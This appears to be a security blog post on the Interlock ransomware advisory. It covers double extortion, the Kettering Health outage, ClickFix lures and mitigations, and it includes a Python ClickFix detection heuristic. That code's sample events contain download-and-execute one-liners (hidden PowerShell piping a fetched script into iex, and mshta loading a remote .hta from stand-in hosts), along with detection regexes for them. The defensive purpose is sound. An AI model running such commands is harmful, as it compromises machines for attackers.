Can a ransomware group be considered to have “made it to the big time” when a group of major U.S. governmental authorities issues a Cybersecurity Advisory on it? If so, Interlock has achieved a measure of fame—or is it infamy? 🚨
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) released the advisory about Interlock in late July. They warn that immediate steps should be taken to minimize potential damage from the ransomware.
Interlock first started showing up in September 2024, going after businesses, as well as critical infrastructure like healthcare. In fact, Interlock caused a shutdown of services offered by Kettering Health in Ohio in May. The outage impacted call center operations and numerous patient care systems, and forced the cancellation of inpatient and outpatient procedures.
The outage was first reported on May 20, and normal operations weren’t restored until June, according to a Kettering website.
Interlock uses the popular (at least among ransomware actors) “double extortion” method, demanding a ransom twice:
1️⃣ To decrypt the files encrypted by the ransomware
2️⃣ To keep from making sensitive data public via a website.
“To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future,” CISA says in its advisory.
Interlock attacks Windows computers and FreeBSD, a version of Linux. It often uses the “ClickFix” method of social engineering. ClickFix typically presents a fake error webpage with what appears to be a CAPTCHA verification prompt. The unaware user, thinking they are typing in a sequence to “verify” their identity or “fix” a problem, is instead running a malicious command supplied by the ransomware operators on the computer, fully compromising the machine.
In other words, game over. 🕹️💥
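Because a ClickFix victim pastes the command themselves, the first thing a defender can look for is a script host launched from the desktop shell with the hallmarks of a “verify you are human” one-liner. The following heuristic is an added example, not code from the advisory or from any vendor; the event fields and the sample events (hosts under .example) are constructed to resemble process-creation telemetry.

```python
import re

# Constructed sample process-creation events (not real telemetry), reduced to the
# fields a Sysmon- or EDR-style record would carry that this check needs.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://verify-captcha.example/r.ps1 | iex"'},
    {"id": 2, "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://captcha-check.example/verify.hta"},
    {"id": 3, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"id": 4, "parent": "devenv.exe", "image": "powershell.exe",
     "cmdline": "powershell -File build.ps1"},
]

# Interpreters a pasted one-liner usually lands in; all are legitimate tools, so
# the image name alone is never a finding.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Hallmarks of a pasted "fix": hidden window, remote fetch, in-memory execution.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "download_and_run": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl)\b.*\|\s*iex|\biex\b",
        re.I),
}


def score_event(event):
    """Return the indicator names an event trips, or [] if it is uninteresting."""
    if event["image"].lower() not in SCRIPT_HOSTS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    # explorer.exe as parent is what a Run-dialog or pasted command looks like;
    # admins rarely launch hidden-window script hosts that way.
    if hits and event["parent"].lower() == "explorer.exe":
        hits.append("interactive_shell_parent")
    return hits


def flag_clickfix(events, min_hits=2):
    """Keep events tripping at least `min_hits` indicators; one URL alone is not enough."""
    return [(e["id"], score_event(e)) for e in events if len(score_event(e)) >= min_hits]


if __name__ == "__main__":
    for event_id, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(reasons)}")
```

Tune `min_hits` and the indicator list to your environment; the point is to alert on the combination of an interactive parent, a script host and remote code, not on any one of them.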
The CISA advisory recommends four steps to mitigate the threat of Interlock: preventing initial breaches via DNS filtering and firewalls; keeping systems patched and up to date; using network segmentation to limit the damage; and requiring multi-factor authentication, or MFA.
These are all good recommendations, of course. Perhaps the most important step any organization can ultimately take is consistent, thorough, and verified user training about social engineering attacks. When ransomware variants like Interlock come on the scene, employees need to be taught about what to look for.
After all, nothing says “come and steal our stuff!” like an open front door. 🚪🔒